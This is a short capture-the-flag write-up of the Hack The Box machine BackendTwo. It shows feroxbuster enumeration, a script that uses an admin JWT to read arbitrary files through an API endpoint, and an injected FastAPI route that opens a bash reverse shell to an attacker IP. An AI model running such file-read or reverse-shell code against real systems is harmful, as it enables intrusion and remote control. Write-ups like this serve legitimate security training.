Hack the Box : BackendTwo

Hack The Box

You need to read the Python code and find where the files are.

Fun Box!

Now I’m using a server with 4GB memory, as 2GB memory is not enough.

I wonder how much AWS will charge me…

00:24 feroxbuster

I ran feroxbuster and dirb.

Feroxbuster showed results before dirb did, so I canceled dirb.

feroxbuster | Kali Linux Tools
sudo apt install feroxbuster
feroxbuster -u http://10.10.11.162 --force-recursion -C 404,405 -m GET,POST
./feroxbuster -u http://10.10.11.162 -H "Accept: application/json" -H "Authorization: Bearer {token}"
curl https://10.10.11.162 \
   -H "Accept: application/json" \
   -H "Authorization: Bearer {token}"

04:45 get_file.sh

Encode the input filename as base64, then run the curl command.

#!/bin/bash
# Usage: ./get_file.sh <path of the file to fetch from the target>

JWTTOKEN=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0eXBlIjoiYWNjZXNzX3Rva2VuIiwiZXhwIjoxNjYxNDc0MjAyLCJpYXQiOjE2NjA3ODMwMDIsInN1YiI6IjEyIiwiaXNfc3VwZXJ1c2VyIjp0cnVlLCJndWlkIjoiNmUwM2MyM2EtMjYyNy00ZWY0LWI0M2QtNWMyY2Q3ZGJmOWM0In0.bxxO2p3VQGpHFfeK7lLAOmJNBo_gzf8otN1--BhKQCw

# base64-encode the filename, then make it URL-safe: '/' -> '_', '+' -> '-', and drop the '=' padding
base64_url=$(echo -n "$1" | base64 | tr '/+' '_-' | tr -d '=')

# .file keeps only the "file" element; -r prints the raw string instead of a quoted JSON string
curl -s "http://10.10.11.162/api/v1/admin/file/${base64_url}" -H "Authorization: bearer $JWTTOKEN" | jq .file -r

+ and / are special characters in a URL, so replace + with - and / with _ as below.

 echo -n "6+6is_f/ine-T" | tr '/+' '_-'
6-6is_f_ine-T

Then strip the trailing = padding.


jq makes the JSON response readable.

The .file filter takes only the file element. -r outputs the raw string, so the escaped \n sequences become real newlines.

06:30 JSON escape

Free Online JSON Escape / Unescape Tool - FreeFormatter.com

06:38 Prepare script to send user.py

@router.delete("/ReverseShell", status_code=200)
def exe_reverse() -> Any:
    """
    exec reverse shell
    """
    import os
    os.system("bash -c 'bash -i >& /dev/tcp/10.10.14.8/1234 0>&1'")
    return

@router.get did not work. I guess GET expects some output, and PUT expects input, etc. DELETE was the right one.

07:18 sudo -l & PAM-Wordle

find / 2>/dev/null | grep wordle